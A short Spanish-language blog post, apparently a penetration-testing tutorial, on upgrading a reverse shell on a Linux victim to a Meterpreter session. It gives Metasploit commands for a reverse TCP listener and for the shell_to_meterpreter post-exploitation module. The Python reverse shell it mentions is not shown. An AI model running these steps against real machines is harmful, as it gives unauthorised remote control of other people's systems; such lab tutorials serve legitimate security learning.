miércoles, 11 de enero de 2017

De una simple Shell a Meterpreter


Definición:

Este módulo intenta actualizar un shell de comandos a meterpreter. La plataforma shell se detecta automáticamente y se selecciona la mejor versión de meterpreter para el destino. Actualmente "meterpreter/reverse_tcp" se usa en Windows y Linux, y "python/meterpreter/reverse_tcp" usado en todos los demás.

PoC:

    En esta prueba de concepto se vulnerará un cliente Linux haciendo uso de una shell reversa escrita en Python, el objetivo es hacer el upgrade de esa shell a meterpreter.

Iniciamos metasploit, y configuramos un listener.

msfconsole
use multi/handler
set payload linux/x64/shell/reverse_tcp
set LHOST 192.168.1.10
set LPORT 8080
exploit -j

    En el equipo víctima ejecutamos cualquier reverse shell, en este caso usaré una hecha en python:



    Una vez nos haya establecido una sesión, la upgradearemos con el siguiente módulo llamado "shell_to_meterpreter":

    use post/multi/manage/shell_to_meterpreter
    sessions
    set SESSION <session-id>
    run


    Una vez finalizado el exploit ya podremos acceder a la sesión meterpreter que se ha creado.

    sessions -i <session-id>

    Vídeo Demo:

     

    Previous Post
    Next Post

    post written by:

    0 comentarios: